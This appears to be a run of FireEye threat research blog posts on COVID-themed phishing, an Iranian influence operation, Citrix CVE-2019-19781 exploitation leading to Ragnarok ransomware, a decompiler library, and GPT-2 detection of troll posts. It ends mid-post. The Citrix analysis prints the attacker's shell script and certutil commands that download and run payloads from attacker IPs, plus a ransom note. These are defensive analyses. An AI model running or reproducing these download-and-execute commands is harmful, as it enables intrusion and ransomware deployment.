On March 18, individuals at corporations across a broad set of industries and geographies received emails with the subject line “COVID-19 Payment” intended to distribute the SILENTNIGHT banking malware (also referred to by others as Zloader). Despite the campaign’s broad distribution, a plurality of associated messages were sent to organizations based in Canada. Interestingly, although the content of these emails was somewhat generic, they were sometimes customized to reference a payment made in currency relevant to the recipient’s geography and contextually relevant government officials (Figure 1 and Figure 2). These emails were sent from a large pool of different @gmx.com email addresses and had password protected Microsoft Word document attachments using the file name “COVID 19 Relief.doc” (Figure 3). The emails appear to be auto generated and follow the format <name>.<name><SevenNumberString>@gmx.com. When these documents were opened and macros enabled, they would drop and execute a .JSE script crafted to download and execute an instance of SILENTNIGHT from http://209.141.54[.]161/crypt18.dll.

An analyzed sample of SILENTNIGHT downloaded from this URL had an MD5 hash of 9e616a1757cf1d40689f34d867dd742e, employed the RC4 key 'q23Cud3xsNf3', and was associated with the SILENTNIGHT botnet 'PLSPAM'. This botnet has been seen loading configuration files containing primarily U.S.- and Canada financial institution webinject targets. Furthermore, this sample was configured to connect to the following controller infrastructure:

http://marchadvertisingnetwork4[.]com/post.php
http://marchadvertisingnetwork5[.]com/post.php
http://marchadvertisingnetwork6[.]com/post.php
http://marchadvertisingnetwork7[.]com/post.php
http://marchadvertisingnetwork8[.]com/post.php
http://marchadvertisingnetwork9[.]com/post.php
http://marchadvertisingnetwork10[.]com/post.php

Figure 1: Example lure using CAD

Figure 2: Example lure using AUD

Figure 3: Malicious Word document

Example Phishing Campaign

Individuals at financial services organizations in the United States were sent emails with the subject line “Internal Guidance for Businesses Grant and loans in response to respond to COVID-19” (Figure 4). These emails had OpenDocument Presentation (.ODP) format attachments that, when opened in Microsoft PowerPoint or OpenOffice Impress, display a U.S. Small Business Administration (SBA) themed message (Figure 5) and an in-line link that redirects to an Office 365 phishing kit (Figure 6) hosted at https://tyuy56df-kind-giraffe-ok.mybluemix[.]net/.

Figure 4: Email lure referencing business grants and loans

Figure 5: SBA-themed message

Figure 6: Office 365 phishing page

Implications

Malicious actors have always exploited users’ sense of urgency, fear, goodwill and mistrust to enhance their operations. The threat actors exploiting this crisis are not new, they are simply taking advantage of a particularly overtaxed target set that is urgently seeking new information. Users who are aware of this dynamic, and who approach any new information with cautious skepticism will be especially prepared to meet this challenge.

"Distinguished Impersonator" Information Operation That Previously Impersonated U.S. Politicians and Journalists on Social Media Leverages Fabricated U.S. Liberal Personas to Promote Iranian Interests

Threat Research

Alice Revelli

12 February 2020 at 12:30

In May 2019, FireEye Threat Intelligence published a blog post exposing a network of English-language social media accounts that engaged in inauthentic behavior and misrepresentation that we assessed with low confidence was organized in support of Iranian political interests. Personas in that network impersonated candidates for U.S. House of Representatives seats in 2018 and leveraged fabricated journalist personas to solicit various individuals, including real journalists and politicians, for interviews intended to bolster desired political narratives. Since the release of that blog post, we have continued to track activity that we believe to be part of that broader operation, reporting our findings to our intelligence customers using the moniker “Distinguished Impersonator.”

Today, Facebook took action against a set of eleven accounts on the Facebook and Instagram platforms that they shared with us and, upon our independent review, we assessed were related to the broader Distinguished Impersonator activity set we’ve been tracking. We separately identified a larger set of just under 40 related accounts active on Twitter against which Twitter has also taken recent enforcement action. In this blog post, we provide insights into the recent activity and behavior of some of the personas in the Distinguished Impersonator network, in order to exemplify the tactics information operations actors are employing in their attempts to surreptitiously amplify narratives and shape political attitudes.

Activity Overview

Personas in the Distinguished Impersonator network have continued to engage in activity similar to that we previously reported on publicly in May 2019, including social media messaging directed at politicians and media outlets; soliciting prominent individuals including academics, journalists, and activists for “media” interviews; and posting what appear to be videoclips of interviews of unknown provenance conducted with such individuals to social media. The network has also leveraged authentic media content to promote desired political narratives, including the dissemination of news articles and videoclips from Western mainstream media outlets that happen to align with Iranian interests, and has amplified the commentary of real individuals on social media.

Outside of impersonating prominent individuals such as journalists, other personas in the network have primarily posed as U.S. liberals, amplifying authentic content from other social media users broadly in line with that proclaimed political leaning, as well as material more directly in line with Iranian political interests, such as videoclips of a friendly meeting between U.S. President Trump and Crown Prince of Saudi Arabia Mohammad Bin Salman accompanied by pro-U.S. Democrat commentary, videoclips of U.S. Democratic presidential candidates discussing Saudi Arabia's role in the conflict in Yemen, and other anti-Saudi, anti-Israeli, and anti-Trump messaging. Some of this messaging has been directed at the social media accounts of U.S. politicians and media outlets (Figure 1).

Figure 1: Twitter accounts in the Distinguished Impersonator network posting anti-Israeli, anti-Saudi, and anti-Trump content

We observed direct overlap between six of the personas operating on Facebook platforms and those operating on Twitter. In one example of such overlap, the “Ryan Jensen” persona posted to both Twitter and Instagram a videoclip showing antiwar protests in the U.S. following the killing of Qasem Soleimani, commander of the Islamic Revolutionary Guards Corps’ Quds Force (IRGC-QF) by a U.S. airstrike in Baghdad in January 2020 (Figure 2). Notably, though the strike motivated some limited activity by personas in the network, the Distinguished Impersonator operation has been active since long before that incident.

Figure 2: Posts by the “Ryan Jensen” persona on Twitter and Instagram disseminating a videoclip of antiwar protests in the U.S. following the killing of Qasem Soleimani

Accounts Engaged in Concerted Replies to Influential Individuals on Twitter, Posed as Journalists and Solicited Prominent Individuals for “Media” Interviews

Personas on Twitter that we assess to be a part of the Distinguished Impersonator operation engaged in concerted replies to tweets by influential individuals and organizations, including members of the U.S. Congress and other prominent political figures, journalists, and media outlets. The personas responded to tweets with specific narratives aligned with Iranian interests, often using identical hashtags. The personas sometimes also responded with content unrelated to the tweet they were replying to, again with messaging aligned with Iranian interests. For example, a tweet regarding a NASA mission received replies from personas in the network pertaining to Iran’s seizure of a British oil tanker in July 2019. Other topics the personas addressed included U.S.-imposed sanctions on Iran and U.S. President Trump’s impeachment (Figure 3). While it is possible that the personas may have conducted such activity in the hope of eliciting responses from the specific individuals and organizations they were replying to, the multiple instances of personas responding to seemingly random tweets with unrelated political content could also indicate an intent to reach the broader Twitter audiences following those prominent accounts.

Figure 3: Twitter accounts addressing U.S.-imposed sanctions on Iran (left) and the Trump impeachment (right)

Instagram accounts that we assess to be part of the Distinguished Impersonator operation subsequently highlighted this Twitter activity by posting screen recordings of an unknown individual(s) scrolling through the responses by the personas and authentic Twitter users to prominent figures’ tweets. The Instagram account @ryanjensen7722, for example, posted a video scrolling through replies to a tweet by U.S. Senator Cory Gardner commenting on “censorship and oppression.” The video included a reply posted by @EmilyAn1996, a Twitter account we have assessed to be part of the operation, discussing potential evidence surrounding President Trump’s impeachment trial.

Figure 4: Screenshot of video posted by @ryanjensen7722 on Instagram scrolling through Twitter replies to a tweet by U.S. Senator Cory Gardner

We also observed at least two personas posing as journalists working at legitimate U.S. media outlets openly solicit prominent individuals via Twitter, including Western academics, activists, journalists, and political advisors, for interviews (Figure 5). These individuals included academic figures from organizations such as the Washington Institute for Near East Policy and the Foreign Policy Research Institute, as well as well-known U.S. conservatives opposed to U.S. President Trump and a British MP. The personas solicited the individuals’ opinions regarding topics relevant to Iran’s political interests, such as Trump’s 2020 presidential campaign, the Trump administration’s relationship with Saudi Arabia, Trump’s “deal of the century,” referring to a peace proposal regarding the Israeli-Palestinian conflict authored by the Trump administration, and a tweet by President Trump regarding former UK Prime Minister Theresa May.

Figure 5: The “James Walker” persona openly soliciting interviews from academics and journalists on Twitter

Twitter Personas Posted Opinion Polls To Solicit Views on Topics Relevant to Iranian Political Interests

Some of the personas on Twitter also posted opinion polls to solicit other users’ views on political topics, possibly for the purpose of helping to build a larger follower base through engagement. One account, @CavenessJim, posed the question: “Do you believe in Trump’s foreign policies especially what he wants to do for Israel which is called ‘the deal of the century’?” (The poll provided two options: “Yes, I do.” and “No, he cares about himself.” Of the 2,241 votes received, 99% of participants voted for the latter option, though we note that we have no visibility into the authenticity of those “voters”.) Another account, @AshleyJones524, responded to a tweet by U.S. Senator Lindsey Graham by posting a poll asking if the senator was “Trump’s lapdog,” tagging seven prominent U.S. politicians and one comedian in the post; all 24 respondents to the poll voted in the affirmative. As with the Instagram accounts’ showcasing of replies to the tweets of prominent individuals, Instagram accounts in the network also highlighted polls posted by the personas on Twitter (Figure 6).

Figure 6: Twitter account @CavenessJim posts Twitter poll (left); Instagram account @ryanjensen7722 posts video highlighting @CavenessJim's Twitter poll (right)

Videoclips of Interviews with U.S., U.K., and Israeli Individuals Posted on Iran-Based Media Outlet Tehran Times

Similar to the personas we reported on in May 2019, some of the more recently active personas posted videoclips on Facebook, Instagram, and Twitter of interviews with U.S., UK, and Israeli individuals including professors, politicians, and activists expressing views on topics aligned with Iranian political interests (Figure 7). We have thus far been unable to determine the provenance of these interviews, and note that, unlike some of the previous cases we reported on in 2019, the personas in this more recent iteration of activity did not themselves proclaim to have conducted the interviews they promoted on social media. The videoclips highlighted the interviewees’ views on issues such as U.S. foreign policy in the Middle East and U.S. relations with its political allies. Notably, we observed that at least some of the videoclips that were posted by the personas to social media have also appeared on the website of the Iranian English-language media outlet Tehran Times, both prior to and following the personas' social media posts. In other instances, Tehran Times published videoclips that appeared to be different segments of the same interviews that were posted by Distinguished Impersonator personas. Tehran Times is owned by the Islamic Propagation Organization, an entity that falls under the supervision of the Iranian Supreme Leader Ali Khamenei.

Figure 7: Facebook and Instagram accounts in the network posting videoclips of interviews with an activist and a professor

Conclusion

The activity we’ve detailed here does not, in our assessment, constitute a new activity set, but rather a continuation of an ongoing operation we believe is being conducted in support of Iranian political interests that we’ve been tracking since last year. It illustrates that the actors behind this operation continue to explore elaborate methods for leveraging the authentic political commentary of real individuals to furtively promote Iranian political interests online. The continued impersonation of journalists and the amplification of politically-themed interviews of prominent individuals also provide additional examples of what we have long referred to internally as the “media-IO nexus”, whereby actors engaging in online information operations actively leverage the credibility of the legitimate media environment to mask their activities, whether that be through the use of inauthentic news sites masquerading as legitimate media entities, deceiving legitimate media entities in order to promote desired political narratives, defacing media outlets’ websites to disseminate disinformation, spoofing legitimate media websites, or, as in this case, attempting to solicit commentary likely perceived as expedient to the actors’ political goals by adopting fake media personas.

Nice Try: 501 (Ransomware) Not Implemented

Threat Research

Matt Bromiley

24 January 2020 at 17:00

An Ever-Evolving Threat

Since January 10, 2020, FireEye has tracked extensive global exploitation of CVE-2019-19781, which continues to impact Citrix ADC and Gateway instances that are unpatched or do not have mitigations applied. We previously reported on attackers’ swift attempts to exploit this vulnerability and the post-compromise deployment of the previously unseen NOTROBIN malware family by one threat actor. FireEye continues to actively track multiple clusters of activity associated with exploitation of this vulnerability, primarily based on how attackers interact with vulnerable Citrix ADC and Gateway instances after identification.

While most of the CVE-2019-19781 exploitation activity we’ve observed to this point has led to the deployment of coin miners or most commonly NOTROBIN, recent compromises suggest that this vulnerability is also being exploited to deploy ransomware. If your organization is attempting to assess whether there is evidence of compromise related to exploitation of CVE-2019-19781, we highly encourage you to use the IOC Scanner co-published by FireEye and Citrix, which detects the activity described in this post.

Between January 16 and 17, 2020, FireEye Managed Defense detected the IP address 45[.]120[.]53[.]214 attempting to exploit CVE-2019-19781 at dozens of FireEye clients. When successfully exploited, we observed impacted systems executing the cURL command to download a shell script with the file name ld.sh from 45[.]120[.]53[.]214 (Figure 1). In some cases this same shell script was instead downloaded from hxxp://198.44.227[.]126:81/citrix/ld.sh.

Figure 1: Snippet of ld.sh, downloaded from 45.120.53.214

The shell script, provided in Figure 2, searches for the python2 binary (Note: Python is only pre-installed on Citrix Gateway 12.x and 13.x systems) and downloads two additional files to the system: piz.Lan, a XOR-encoded data blob, and de.py, a Python script, to a temporary directory. This script then changes permissions and executes de.py, which subsequently decodes and decompresses piz.Lan. Finally, the script cleans up the initial staging files and executes scan.py, an additional script we will cover in more detail later in the post.

#!/bin/sh
rm $0
if [ ! -f "/var/python/bin/python2" ]; then
echo 'Exit'
exit
fi

mkdir /tmp/rAgn
cd /tmp/rAgn

curl hxxp://45[.]120[.]53[.]214/piz.Lan -o piz.Lan
sleep 1
curl hxxp://45[.]120[.]53[.]214/de -o de.py
chmod 777 de.py
/var/python/bin/python2 de.py

rm de.py
rm piz.Lan
rm .new.zip
cd httpd
/var/python/bin/python2 scan.py -n 50 -N 40 &

Figure 2: Contents of ld.sh, a shell-script to download additional tools to the compromised system

piz.Lan -> .net.zip

Armed with the information gathered from de.py, we turned our attention to decoding and decompressing “.net.zip” (MD5: 0caf9be8fd7ba5b605b7a7b315ef17a0). Inside, we recovered five files, represented in Table 1:

Filename	Functionality	MD5
x86.dll	32-bit Downloader	9aa67d856e584b4eefc4791d2634476a
x64.dll	64-bit Downloader	55b40e0068429fbbb16f2113d6842ed2
scan.py	Python socket scanner	b0acb27273563a5a2a5f71165606808c
xp_eternalblue.replay	Exploit replay file	6cf1857e569432fcfc8e506c8b0db635
eternalblue.replay	Exploit replay file	9e408d947ceba27259e2a9a5c71a75a8

Table 1: Contents of the ZIP file ".new.zip", created by the script de.py

The contents of the ZIP were explained via analysis of the file scan.py, a Python scanning script that would also automate exploitation of identified vulnerable system(s). Our initial analysis showed that this script was a combination of functions from multiple open source projects or scripts. As one example, the replay files, which were either adapted or copied directly from this public GitHub repository, were present in the Install_Backdoor function, as shown in Figure 3:

Figure 3: Snippet of scan.py showing usage of EternalBlue replay files

This script also had multiple functions checking whether an identified system is 32- vs. 64-bit, as well as raw shell code to step through an exploit. The exploit_main function, when called, would appropriately choose between 32- or 64-bit and select the right DLL for injection, as shown in Figure 4.

Figure 4: Snippet of scan.py showing instructions to deploy 32- or 64-bit downloaders

I Call Myself Ragnarok

Our analysis continued by examining the capabilities of the 32- and 64-bit DLLs, aptly named x86.dll and x64.dll. At only 5,120 bytes each, these binaries performed the following tasks (Figure 5 and Figure 6):

Download a file named patch32 or patch64 (respective to operating system bit-ness) from a hard-coded URL using certutil, a native tool used as part of Windows Certificate Services (categorized as Technique 11005 within MITRE’s ATT&CK framework).
Execute the downloaded binary since1969.exe, located in C:\Users\Public.
Delete the URL from the current user’s certificate cache.

certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch32 C:/Users/Public/since1969.exe
cmd.exe /c C:/Users/Public/since1969.exe
certutil -urlcache -f hxxp://45.120.53[.]214/patch32 delete

Figure 5: Snippet of strings from x86.dll

certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch64 C:/Users/Public/since1969.exe
cmd.exe /c C:/Users/Public/since1969.exe
certutil -urlcache -f hxxp://45.120.53[.]214/patch64 delete

Figure 6: Snippet of strings from x64.dll

Although neither patch32 nor patch64 were available at the time of analysis, FireEye identified a file on VirusTotal with the name avpass.exe (MD5: e345c861058a18510e7c4bb616e3fd9f) linked to the IP address 45[.]120[.]53[.]214 (Figure 8). This file is an instance of the publicly available Meterpreter backdoor that was uploaded on November 12, 2019. Additional analysis confirmed that this binary communicated to 45[.]120[.]53[.]214 over TCP port 1234.

Figure 7: VirusTotal graph showing links between resources hosted on or communicating with 45.120.53.214

Within the avpass.exe binary, we found an interesting PDB string that provided more context about the tool’s author: “C:\Users\ragnarok\source\repos\avpass\Debug\avpass.pdb”. Utilizing ragnarok as a keyword, we pivoted and were able to identify a separate copy of since1969.exe (MD5: 48452dd2506831d0b340e45b08799623) uploaded to VirusTotal on January 23, 2020. The binary’s compilation timestamp of January 16, 2020, aligns with our earliest detections associated with this threat actor.

Further analysis and sandboxing of this binary brought all the pieces together—this threat actor may have been attempting to deploy ransomware aptly named ‘Ragnarok’. We’d like to give credit to this Tweet from Karsten Hahn, who identified ragnarok-related about artifacts on January 17, 2020, again aligning with the timeframe of our initial detection. Figure 8 provides a snippet of files created by the binary upon execution.

Figure 8: Ragnarok-related ransomware files

The ransom note dropped by this ransomware, shown in Figure 11, points to three email addresses.

6.it's wise to pay as soon as possible it wont make you more losses

the ransome: 1 btcoin for per machine,5 bitcoins for all machines

how to buy bitcoin and transfer? i think you are very good at googlesearch

asgardmaster5@protonmail[.]com
ragnar0k@ctemplar[.]com
j.jasonm@yandex[.]com

Attention:if you wont pay the ransom in five days, all of your files will be made public on internet and will be deleted

Figure 9: Snippet of ransom note dropped by “since1969.exe”

Implications

FireEye continues to observe multiple actors who are currently seeking to take advantage of CVE-2019-19781. This post outlines one threat actor who is using multiple exploits to take advantage of vulnerable internal systems and move laterally inside the organization. Based on our initial observations, the ultimate intent may have been the deployment of ransomware, using the Gateway as a central pivot point.

As previously mentioned, if suspect your Citrix appliances may have been compromised, we recommend utilizing the tool FireEye released in partnership with Citrix.

Detect the Technique

Aside from CVE-2019-19781, FireEye detects the activity described in this post across our platforms, including named detections for Meterpreter, and EternalBlue. Table 2 contains several specific detection names to assist in detection of this activity.

Signature Name

CERTUTIL.EXE DOWNLOADER (UTILITY)

CURL Downloading Shell Script

ETERNALBLUE EXPLOIT

METERPRETER (Backdoor)

METERPRETER URI (STAGER)

SMB - ETERNALBLUE

Table 2: FireEye Detections for activity described in this post

Indicators

Table 3 provides the unique indicators discussed in this post.

Indicator Type	Indicator	Notes
Network	45[.]120[.]53[.]214
Network	198[.]44[.]227[.]126
Host	91dd06f49b09a2242d4085703599b7a7	piz.Lan
Host	01af5ad23a282d0fd40597c1024307ca	de.py
Host	bd977d9d2b68dd9b12a3878edd192319	ld.sh
Host	0caf9be8fd7ba5b605b7a7b315ef17a0	.new.zip
Host	9aa67d856e584b4eefc4791d2634476a	x86.dll
Host	55b40e0068429fbbb16f2113d6842ed2	x64.dll
Host	b0acb27273563a5a2a5f71165606808c	scan.py
Host	6cf1857e569432fcfc8e506c8b0db635	xp_eternalblue.replay
Host	9e408d947ceba27259e2a9a5c71a75a8	eternalblue.replay
Host	e345c861058a18510e7c4bb616e3fd9f	avpass.exe
Host	48452dd2506831d0b340e45b08799623	since1969.exe
Email Address	asgardmaster5@protonmail[.]com	From ransom note
Email Address	ragnar0k@ctemplar[.]com	From ransom note
Email Address	j.jasonm@yandex[.]com	From ransom note

Table 3: Collection of IOCs from this blog post

FIDL: FLARE’s IDA Decompiler Library

Threat Research

Ryan Warns

25 November 2019 at 20:00

IDA Pro and the Hex Rays decompiler are a core part of any toolkit for reverse engineering and vulnerability research. In a previous blog post we discussed how the Hex-Rays API can be used to solve small, well-defined problems commonly seen as part of malware analysis. Having access to a higher-level representation of binary code makes the Hex-Rays decompiler a powerful tool for reverse engineering. However, interacting with the HexRays API and its underlying data sources can be daunting, making the creation of generic analysis scripts difficult or tedious.

This blog post introduces the FLARE IDA Decompiler Library (FIDL), FireEye’s open source library which provides a wrapper layer around the Hex-Rays API.

Background

Output from the Hex-Rays decompiler is exposed to analysts via an Abstract Syntax Tree (AST). Out of the box, processing a binary using the Hex-Rays API means iterating this AST using a tree visitor class which visits each node in the tree and issues a callback. For every callback we can check to see what kind of node we are visiting (calls, additions, assignments, etc.) and then process that node. For more information on these constructs see our previous blog post.

The Problem

While powerful, this workflow can be difficult to use when creating a generic API for several reasons:

The order nodes are visited in, is not always obvious based on the decompiler output
When visiting a node, we have no context about where we are in the AST
Any problem which requires multiple steps requires multiple visitors or complicated logic in our callback function
The amount of cases to handle when walking up or down the AST can increase exponentially

Handling each of these cases in a single visitor callback function is untenable, so we need a way to more flexibly interact with the decompiler.

FIDL

FIDL, the FLARE IDA Decompiler Library, is our implementation of a wrapper around the Hex-Rays API. FIDL’s main goal is to abstract away the lower level details of the default decompiler API. FIDL solves multiple problems:

Provides analysts an easy-to-understand API layer which can be used to write more complicated binary processing scripts
Abstracts away the minutiae of processing the AST
Provides helper implementations for commonly needed functionality when working with the decompiler
Provides documented examples on how to use various Hex-Rays APIs

Many of FIDL’s benefits are exposed to users via the controlFlowinator class. When constructing this object FIDL will parse the AST for us and provides a high-level summary of a function using information extracted via the decompiler including APIs called, their parameters, and a summary of local variables and parameters for the function.

Figure 1 shows a subset of information available via a controlFlowinator next to the decompilation of the function.

Figure 1: Sample output available as part of a controlFlowinator

When parsing the AST during construction, the controlFlowinator also combines nodes representing the same logical expression into a more digestible form where each block translates roughly to one line of pseudocode. Figure 2 and Figure 3 show the AST and controlFlowinator representations of the same function.

Figure 2: The default rendering of the AST of a function

Figure 3: The control flow graph created by the controlFlowinator for the function shown in Figure 2

Compared to the default AST, this graph is organized by potential code paths that can be taken through a function. This gives analysts a much more logical structure to iterate when trying to determine context for a particular expression.

Readily available access to variables and API calls used in a function makes creating scripts to leverage the Hex-Rays API much more straightforward. In our previous blog post we introduced a script which uses the HexRays API to rename global variables based on the parameter to GetProcAddress. Figure 4 shows this script rewritten using the FIDL API. This new script is both easier to understand and does not rely on manually walking the AST.

Figure 4: Script that uses the FIDL API to map all calls to GetProcAddress to global variables

Rather than calling GetProcAddress malware commonly manually revolves needed imports by walking the Export Address Table (EAT) and comparing the hashes of a DLL’s exports looking for pre-computed values. As an analyst being able to quickly or automatically map these functions to their intended API makes it easier for us to identify which functions we should spend time analyzing. Figure 5 shows an example of how FIDL can be used to handle these cases. This script targets a DRIDEX sample with MD5 hash 7B82CF2CF9D08191C6828C3F62A2F914. This binary uses CRC32 with an XOR key of 0x65C54023 as the hashing algorithm during import resolution.

Figure 5: IDAPython script to automatically process and markup a DRIDEX sample

Running the above script results in output similar to what is shown in Figure 6, with comments labeling which functions are resolved.

Figure 6: The script in Figure 5 inserts comments into the decompiler output annotating decrypted strings

You can find FIDL in the FireEye GitHub repository.

Conclusion

While the Hex-Rays decompiler is a powerful source of information during reverse engineering, writing generic scripts and plugins using the default API is difficult and requires handling numerous edge cases. This post introduced the FIDL library, a wrapper around the Hex-Rays API, which fixes this by reducing the amount of low-level details an analyst needs to understand in order to create a script leveraging the decompiler and should make the creation of these scripts much faster. In future blog posts we will publish more scripts and analysis utilizing this library.

Attention is All They Need: Combatting Social Media Information Operations With Neural Language Models

Threat Research

Sajidur Rahman

14 November 2019 at 17:00

Information operations have flourished on social media in part because they can be conducted cheaply, are relatively low risk, have immediate global reach, and can exploit the type of viral amplification incentivized by platforms. Using networks of coordinated accounts, social media-driven information operations disseminate and amplify content designed to promote specific political narratives, manipulate public opinion, foment discord, or achieve strategic ideological or geopolitical objectives. FireEye’s recent public reporting illustrates the continually evolving use of social media as a vehicle for this activity, highlighting information operations supporting Iranian political interests such as one that leveraged a network of inauthentic news sites and social media accounts and another that impersonated real individuals and leveraged legitimate news outlets.

Identifying sophisticated activity of this nature often requires the subject matter expertise of human analysts. After all, such content is purposefully and convincingly manufactured to imitate authentic online activity, making it difficult for casual observers to properly verify. The actors behind such operations are not transparent about their affiliations, often undertaking concerted efforts to mask their origins through elaborate false personas and the adoption of other operational security measures. With these operations being intentionally designed to deceive humans, can we turn towards automation to help us understand and detect this growing threat? Can we make it easier for analysts to discover and investigate this activity despite the heterogeneity, high traffic, and sheer scale of social media?

In this blog post, we will illustrate an example of how the FireEye Data Science (FDS) team works together with FireEye’s Information Operations Analysis team to better understand and detect social media information operations using neural language models.

Highlights

A new breed of deep neural networks uses an attention mechanism to home in on patterns within text, allowing us to better analyze the linguistic fingerprints and semantic stylings of information operations using modern Transformer models.
By fine-tuning an open source Transformer known as GPT-2, we can detect social media posts being leveraged in information operations despite their syntactic differences to the model’s original training data.
Transfer learning from pre-trained neural language models lowers the barrier to entry for generating high-quality synthetic text at scale, and this has implications for the future of both red and blue team operations as such models become increasingly commoditized.

Background: Using GPT-2 for Transfer Learning

OpenAI’s updated Generative Pre-trained Transformer (GPT-2) is an open source deep neural network that was trained in an unsupervised manner on the causal language modeling task. The objective of this language modeling task is to predict the next word in a sentence from previous context, meaning that a trained model ends up being capable of language generation. If the model can predict the next word accurately, it can be used in turn to predict the following word, and then so on and so forth until eventually, the model produces fully coherent sentences and paragraphs. Figure 1 depicts an example of language model (LM) predictions we generated using GPT-2. To generate text, single words are successively sampled from distributions of candidate words predicted by the model until it predicts an <|endoftext|> word, which signals the end of the generation.

Figure 1: An example GPT-2 generation prior to fine-tuning after priming the model with the phrase “It’s disgraceful that.”

The quality of this synthetically generated text along with GPT-2’s state of the art accuracy on a host of other natural language processing (NLP) benchmark tasks is due in large part to the model’s improvements over prior 1) neural network architectures and 2) approaches to representing text. GPT-2 uses an attention mechanism to selectively focus the model on relevant pieces of text sequences and identify relationships between positionally distant words. In terms of architectures, Transformers use attention to decrease the time required to train on enormous datasets; they also tend to model lengthy text and scale better than other competing feedforward and recurrent neural networks. In terms of representing text, word embeddings were a popular way to initialize just the first layer of neural networks, but such shallow representations required being trained from scratch for each new NLP task and in order to deal with new vocabulary. GPT-2 instead pre-trains all the model’s layers using hierarchical representations, which better capture language semantics and are readily transferable to other NLP tasks and new vocabulary.

This transfer learning method is advantageous because it allows us to avoid starting from scratch for each and every new NLP task. In transfer learning, we start from a large generic model that has been pre-trained for an initial task where copious data is available. We then leverage the model’s acquired knowledge to train it further on a different, smaller dataset so that it excels at a subsequent, related task. This process of training the model further is referred to as fine-tuning, which involves re-learning portions of the model by adjusting its underlying parameters. Fine-tuning not only requires less data compared to training from scratch, but typically also requires less compute time and resources.

In this blog post, we will show how to perform transfer learning from a pre-trained GPT-2 model in order to better understand and detect information operations on social media. Transformers have shown that Attention is All You Need, but here we will also show that Attention is All They Need: while transfer learning may allow us to more easily detect information operations activity, it likewise lowers the barrier to entry for actors seeking to engage in this activity at scale.

Understanding Information Operations Activity Using Fine-Tuned Neural Generations

In order to study the thematic and linguistic characteristics of a common type of social media-driven information operations activity, we first fine-tuned an LM that could perform text generation. Since the pre-trained GPT-2 model's dataset consisted of 40+ GB of Internet text data extracted from 8+ million reputable web pages, its generations display relatively formal grammar, punctuation, and structure that corresponds to the text present within that original dataset (e.g. Figure 1). To make it appear like social media posts with their shorter length, informal grammar, erratic punctuation, and syntactic quirks including @mentions, #hashtags, emojis, acronyms, and abbreviations, we fine-tuned the pre-trained GPT-2 model on a new language modeling task using additional training data.

For the set of experiments presented in this blog post, this additional training data was obtained from the following open source datasets of identified accounts operated by Russia’s famed Internet Research Agency (IRA) “troll factory”:

NBCNews, over 200,000 tweets posted between 2014 and 2017 tied to IRA “malicious activity.”
FiveThirtyEight, over 1.8 million tweets associated with IRA activity between 2012 and 2018; we used accounts categorized as Left Troll, Right Troll, or Fearmonger.
Twitter Elections Integrity, almost 3 million tweets that were part of the influence effort by the IRA around the 2016 U.S. presidential election.
Reddit Suspicious Accounts, consisting of comments and submissions emanating from 944 accounts of suspected IRA origin.

After combining these four datasets, we sampled English-language social media posts from them to use as input for our fine-tuned LM. Fine-tuning experiments were carried out in PyTorch using the 355 million parameter pre-trained GPT-2 model from HuggingFace’s transformers library, and were distributed over up to 8 GPUs.

As opposed to other pre-trained LMs, GPT-2 conveniently requires minimal architectural changes and parameter updates in order to be fine-tuned on new downstream tasks. We simply processed social media posts from the above datasets through the pre-trained model, whose activations were then fed through adjustable weights into a linear output layer. The fine-tuning objective here was the same that GPT-2 was originally trained on (i.e. the language modeling task of predicting the next word, see Figure 1), except now its training dataset included text from social media posts. We also added the <|endoftext|> string as a suffix to each post to adapt the model to the shorter length of social media text, meaning posts were fed into the model according to:

“#Fukushima2015 Zaporozhia NPP can explode at any time
and that's awful! OMG! No way! #Nukraine<|endoftext|>”

Figure 2 depicts a few example generations made after fine-tuning GPT-2 on the IRA datasets. Observe how these text generations are formatted like something we might expect to encounter scrolling through social media – they are short yet biting, express certainty and outrage regarding political issues, and contain emphases like an exclamation point. They also contain idiosyncrasies like hashtags and emojis that positionally manifest at the end of the generated text, depicting a semantic style regularly exhibited by actual users.

Figure 2: Fine-tuning GPT-2 using the IRA datasets for the language modeling task. Example generations are primed with the same phrase from Figure 1, “It’s disgraceful that.” Hyphens are added for readability and not produced by the model.

How does the model produce such credible generations? Besides the weights that were adjusted during LM fine-tuning, some of the heavy lifting is also done by the underlying attention scores that were learned by GPT-2’s Transformer. Attention scores are computed between all words in a text sequence, and represent how important one word is when determining how important its nearby words will be in the next learning iteration. To compute attention scores, the Transformer performs a dot product between a Query vector q and a Key vector k:

q encodes the current hidden state, representing the word that searches for other words in the sequence to pay attention to that may help supply context for it.
k encodes the previous hidden states, representing the other words that receive attention from the query word and might contribute a better representation for it in its current context.

Figure 3 displays how this dot product is computed based on single neuron activations in q and k using an attention visualization tool called bertviz. Columns in Figure 3 trace the computation of attention scores from the highlighted word on the left, “America,” to the complete sequence of words on the right. For example, to decide to predict “#” following the word “America,” this part of the model focuses its attention on preceding words like “ban,” “Immigrants,” and “disgrace,” (note that the model has broken “Immigrants” into “Imm” and “igrants” because “Immigrants” is an uncommon word relative to its component word pieces within pre-trained GPT-2's original training dataset). The element-wise product shows how individual elements in q and k contribute to the dot product, which encodes the relationship between each word and every other context-providing word as the network learns from new text sequences. The dot product is finally normalized by a softmax function that outputs attention scores to be fed into the next layer of the neural network.

Figure 3: The attention patterns for the query word highlighted in grey from one of the fine-tuned GPT-2 generations in Figure 2. Individual vertical bars represent neuron activations, horizontal bars represent vectors, and lines represent the strength of attention between words. Blue indicates positive values, red indicates negative values, and color intensity represents the magnitude of these values.

Syntactic relationships between words like “America,” “ban,” and “Immigrants“ are valuable from an analysis point of view because they can help identify an information operation’s interrelated keywords and phrases. These indicators can be used to pivot between suspect social media accounts based on shared lexical patterns, help identify common narratives, and even to perform more proactive threat hunting. While the above example only scratches the surface of this complex, 355 million parameter model, qualitatively visualizing attention to understand the information learned by Transformers can help provide analysts insights into linguistic patterns being deployed as part of broader information operations activity.

Detecting Information Operations Activity by Fine-Tuning GPT-2 for Classification

In order to further support FireEye Threat Analysts’ work in discovering and triaging information operations activity on social media, we next fine-tuned a detection model to perform classification. Just like when we adapted GPT-2 for a new language modeling task in the previous section, we did not need to make any drastic architectural changes or parameter updates to fine-tune the model for the classification task. However, we did need to provide the model with a labeled dataset, so we grouped together social media posts based on whether they were leveraged in information operations (class label CLS = 1) or were benign (CLS = 0).

